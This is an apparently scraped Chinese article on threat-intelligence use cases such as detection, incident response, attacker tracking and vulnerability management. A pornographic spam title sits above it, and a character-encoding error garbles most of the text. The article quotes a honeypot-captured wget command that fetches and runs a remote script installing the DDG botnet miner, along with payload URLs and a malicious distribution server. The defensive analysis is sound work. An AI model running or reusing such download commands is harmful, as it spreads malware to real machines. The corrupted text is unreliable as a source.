压在透明的玻璃上c-国产精品国产一级A片精品免费-国产精品视频网-成人黄网站18秘 免费看|www.tcsft.com

引言

現(xiàn)今網(wǎng)絡(luò)攻防環(huán)境愈發(fā)復(fù)雜，威脅情報現(xiàn)在作為一種彌補(bǔ)攻防信息不對稱的安全技術(shù)逐漸得到了廣泛的認(rèn)識，更多企業(yè)也開始接受并購買威脅情報數(shù)據(jù)來建設(shè)企業(yè)安全。筆者對當(dāng)下的威脅情報應(yīng)用較多的場景進(jìn)行了一些總結(jié)，期待與業(yè)界各位權(quán)威進(jìn)一步交流。

一．威脅情報定義

在探討威脅情報應(yīng)用的問題之前，我們必須首先要回答清楚：什么是威脅情報？

SANS研究院的說法是：針對安全威脅、威脅者、利用、惡意軟件、漏洞和危害指標(biāo)，所收集的用于評估和應(yīng)用的數(shù)據(jù)集。Gartner的解釋則是：威脅情報是基于證據(jù)的知識，包括上下文、機(jī)制、指標(biāo)、隱含和可操作的建議，針對一個現(xiàn)存的或新興的威脅，可用于做出相應(yīng)決定的知識。

很顯然，單一的信息或數(shù)據(jù)一般算不上威脅情報，只有經(jīng)過分析處理過的準(zhǔn)確有價值的信息才能算是威脅情報。我們對這些解釋提取一個公約數(shù)，可以給威脅情報一個簡明的定義：以證據(jù)為基礎(chǔ)的知識（包括背景、機(jī)制、指標(biāo)、含義以及可采取的行動建議），關(guān)于當(dāng)前的或正在出現(xiàn)的威脅或危害資產(chǎn)的，可用于通報有關(guān)該主題對威脅或危險作出反應(yīng)的決定。

二．威脅情報的應(yīng)用場景

威脅情報有以下幾個常見的應(yīng)用場景：

1. 攻擊檢測與防御
2. 攻擊團(tuán)伙追蹤
3. 威脅狩獵
4. 事件監(jiān)測與響應(yīng)
5. 基于情報驅(qū)動的漏洞管理
6. 暗網(wǎng)情報發(fā)現(xiàn)

2.1攻擊檢測與防御

威脅情報應(yīng)用于攻擊檢測與防御是應(yīng)用得較多的場景之一。通過機(jī)讀情報以訂閱方式集成到現(xiàn)有的安全產(chǎn)品之中，實(shí)現(xiàn)與安全產(chǎn)品協(xié)同工作，如SIEM、IDS等產(chǎn)品中，可以有效的縮短平均檢測時間（MTTD：Mean-Time-to-Detect），當(dāng)平均檢測時間降低即表示著企業(yè)的安全能力得到了提升。威脅情報對已有的IP/Domain/HASH等信譽(yù)庫進(jìn)行了標(biāo)準(zhǔn)化的補(bǔ)充，可以讓其可以更加有效發(fā)揮作用。準(zhǔn)確及時的失陷標(biāo)示數(shù)據(jù)可以幫助用戶快速處理已經(jīng)或正在發(fā)生的威脅，比如黑樣本的HASH、對外連接的C&C及Downloader服務(wù)器的IP或域名，網(wǎng)絡(luò)邊界設(shè)備或運(yùn)行于主機(jī)上的Agent可以通過簡單的匹配就能發(fā)現(xiàn)并采用自動化的應(yīng)對措施。

下面通過應(yīng)用實(shí)例來說明威脅情報在攻擊檢測與防御中的作用。筆者從部署的蜜網(wǎng)中發(fā)現(xiàn)了一條攻擊信息wget -q -O- http://67.205.168.20:8000/i.sh。鏈接的主要內(nèi)容為shell腳本，功能是遠(yuǎn)程下載挖礦程序，創(chuàng)建定時任務(wù)。

由上圖可以得知攻擊載荷下載鏈接為http://67.205.168.20:8000/static/4011/ddgs.i686和http://67.205.168.20:8000/static/4011/ddgs.x86_64，經(jīng)過分析確認(rèn)為DDG僵尸網(wǎng)絡(luò)病毒，將信息整理為機(jī)讀情報（STIX格式），大致如下圖：

應(yīng)用于其他安全產(chǎn)品中需要轉(zhuǎn)化成安全產(chǎn)品的標(biāo)準(zhǔn)格式，例如IDS產(chǎn)品。IP類的可以應(yīng)用于NIDS中，惡意軟件的hash可應(yīng)用于HIDS，例如下圖將上述情報中的IP其轉(zhuǎn)化成Snort規(guī)則，可以直接在網(wǎng)絡(luò)層面對其檢測：

2.2事件監(jiān)測與響應(yīng)

威脅情報應(yīng)用于事件監(jiān)測與響應(yīng)也是威脅情報使用較多的一個場景之一。安全人員對檢測到的網(wǎng)絡(luò)威脅進(jìn)行響應(yīng)，調(diào)查已發(fā)生或者正在發(fā)生的事件。在此場景下，使用威脅情報是為了縮短平均響應(yīng)時間（MTTR：Mean-Time-to-Respond）。

在日常處理應(yīng)急過程中，事中階段，安全人員會根據(jù)IOC信息以及其他相關(guān)信息快速識別攻擊，或者根據(jù)機(jī)子所感染顯示的一些特征，如外連的IP、注冊表信息、進(jìn)程名等去查詢是否有出現(xiàn)類似的情報信息（開源情報或者內(nèi)部情報），來明確威脅攻擊類型，來源以及攻擊的意圖等?？焖僭u估企業(yè)內(nèi)部資產(chǎn)受損程度及影響面，判斷攻擊所處的階段，做出針對性的措施來阻止攻擊進(jìn)一步擴(kuò)大；事后階段，安全人員可以根據(jù)事件中出現(xiàn)的新的情報信息進(jìn)行增補(bǔ)，如新變種、新C&C等，方便后續(xù)安全運(yùn)營以及更好地應(yīng)對同類型的攻擊。

舉個例子，客戶反饋個人PC異?？D，可能感染了病毒?，F(xiàn)場取證之后，安全分析人員確認(rèn)為挖礦攻擊事件。首先查看了計劃任務(wù)，發(fā)現(xiàn)創(chuàng)建了兩個SYSTEM權(quán)限的任務(wù)計劃。路徑分別為C:\Windows\Fonts\Mysql\wai.bat和C:\Windows\Fonts\Mysql\nei.bat。

根據(jù)病毒所體現(xiàn)的行為特征（CPU資源占用高、可疑的計劃任務(wù)）結(jié)合開源情報，可以快速確定其為NSABuffMiner家族，可能為變種。報告中所分享的IOC信息，幫助安全運(yùn)維人員定位到可疑進(jìn)程的路徑以及外連礦池地址，優(yōu)先封禁外連的礦池IP，然后清除PC上所感染的惡意代碼，修補(bǔ)永恒之藍(lán)漏洞。事后階段，對整個攻擊事件進(jìn)行復(fù)盤分析，發(fā)現(xiàn)攻擊者首先入侵了服務(wù)器，然后使用了永恒之藍(lán)系列漏洞利用工具，進(jìn)而感染了內(nèi)網(wǎng)。

2.3攻擊團(tuán)伙追蹤

威脅情報追蹤攻擊團(tuán)伙是一個長期的運(yùn)營過程，需要積累一定量的攻擊團(tuán)伙的TTP，即戰(zhàn)術(shù)、技術(shù)、過程三個維度。當(dāng)然這只是針對高級攻擊組織，對于小黑客來說，根據(jù)一些攻擊中暴露的細(xì)節(jié)并結(jié)合威脅情報就可以追溯得到。下面通過一個例子來說明威脅情報在這個場景下的作用。

攻擊者搭建HFS惡意站點(diǎn)傳播惡意軟件，站點(diǎn)url：http://125.65.109.98:8080/，監(jiān)測日期為2018年6月28號。攻擊者惡意工具軟件類型包括了后門遠(yuǎn)控、DDOS軟件、門羅幣挖礦、爆破工具、抓雞工具、掃描工具，還有用于灰產(chǎn)的刷量工具。

根據(jù)此IP，我們在情報平臺上查詢Passivedns，可以得知該IP綁定的域名是qq461677041.f3322.org

根據(jù)qq461677041字符查找相關(guān)信息

同時我們還挖掘到該開發(fā)者的百度網(wǎng)盤，昵稱“l(fā)ove小科520”，分享的工具與HFS站點(diǎn)如出一轍。

再細(xì)深挖，根據(jù)其微信號和QQ為同一賬號，可以找到對應(yīng)的攻擊者畫像，確認(rèn)攻擊者的活動范圍，在此不在贅述。

使用威脅情報對攻擊團(tuán)伙進(jìn)行追溯其實(shí)就是用好手上的數(shù)據(jù)，盡可能提煉攻擊團(tuán)伙的TTP，再結(jié)合基礎(chǔ)數(shù)據(jù)生成攻擊團(tuán)伙的攻擊畫像，跟進(jìn)分析相似度高的攻擊事件，不斷總結(jié)更新攻擊者畫像。

2.4威脅狩獵

威脅狩獵是一種當(dāng)前較新的高級威脅發(fā)現(xiàn)的方法，旨在事件發(fā)生之前，提前發(fā)現(xiàn)威脅，由被動變?yōu)橹鲃?。這需要安全分析人員具有較高的威脅發(fā)現(xiàn)能力，主動去根據(jù)網(wǎng)絡(luò)中的異常情況來發(fā)現(xiàn)高級威脅，而威脅情報就能給與安全分析人員很好的幫助。 威脅獵捕是對各種數(shù)據(jù)源，所以IOC情報在威脅狩獵中可以起到重要作用。威脅狩獵模型中使用IOC-Based Hunting和TTP-Based Hunting。

2.5基于情報驅(qū)動的漏洞管理

漏洞情報管理的主要目的是為了保護(hù)用戶資產(chǎn)、數(shù)據(jù)傳輸過程。結(jié)合威脅情報，可以幫助安全運(yùn)維人員快速定位影響資產(chǎn)安全的關(guān)鍵風(fēng)險點(diǎn)。當(dāng)漏洞情報被披露時，企業(yè)可以根據(jù)漏洞情報再結(jié)合企業(yè)的資產(chǎn)信息來分析漏洞對整個業(yè)務(wù)的影響，提前修復(fù)關(guān)鍵漏洞。特別是在0day漏洞的在野利用事件爆發(fā)的時候，漏洞情報就顯得格外重要。

2017年Wanncry勒索病毒利用的MS17-010漏洞感染了大量的設(shè)備終端，之所以會有這種大規(guī)模的漏洞攻擊爆發(fā)，Shadowbroker發(fā)布漏洞利用工具的時間為4月14日，較勒索病毒爆發(fā)期還有將近一個月的時間差。如果當(dāng)時采用基于情報驅(qū)動漏洞管理的機(jī)制之下，完全可以將企業(yè)的損失降低。當(dāng)然企業(yè)和普通用戶不可能自己建立一套漏洞情報系統(tǒng)，所以就需要外部情報系統(tǒng)推送漏洞情報來輔助企業(yè)安全人員來定位資產(chǎn)風(fēng)險點(diǎn)。

2.6暗網(wǎng)情報發(fā)現(xiàn)

暗網(wǎng)中存在大量非法交易，惡意代碼、毒品、數(shù)據(jù)販賣等。近年國內(nèi)也發(fā)生了多起大型數(shù)據(jù)泄露的事件，諸如2018年華住酒店數(shù)據(jù)泄露并在暗網(wǎng)出售；Acfun遭黑客攻擊數(shù)據(jù)泄露。下圖為華住旗下酒店開放數(shù)據(jù)在暗網(wǎng)出售截圖：

企業(yè)需要此類的情報信息來避免被薅羊毛、數(shù)據(jù)泄露、業(yè)務(wù)風(fēng)險等。雖然有可能對于企業(yè)只是亡羊補(bǔ)牢的操作，但是在一定程度上能夠?yàn)槠髽I(yè)提供信息，幫助企業(yè)定位到可疑的攻擊點(diǎn)。

三．結(jié)語

威脅情報無疑是當(dāng)前安全行業(yè)的一個熱點(diǎn)關(guān)鍵詞，也被業(yè)界寄予了厚望。但就實(shí)際的應(yīng)用和經(jīng)驗(yàn)來看，安全領(lǐng)域不存在單點(diǎn)的銀彈技術(shù)，威脅情報固然在某些方面有極高的能力，但并非解決安全問題的“靈丹妙藥”——威脅情報的應(yīng)用場景雖然多種多樣，但是如何生產(chǎn)優(yōu)質(zhì)的情報，如何形成情報閉環(huán)、推動情報落地，這些才是問題的關(guān)鍵。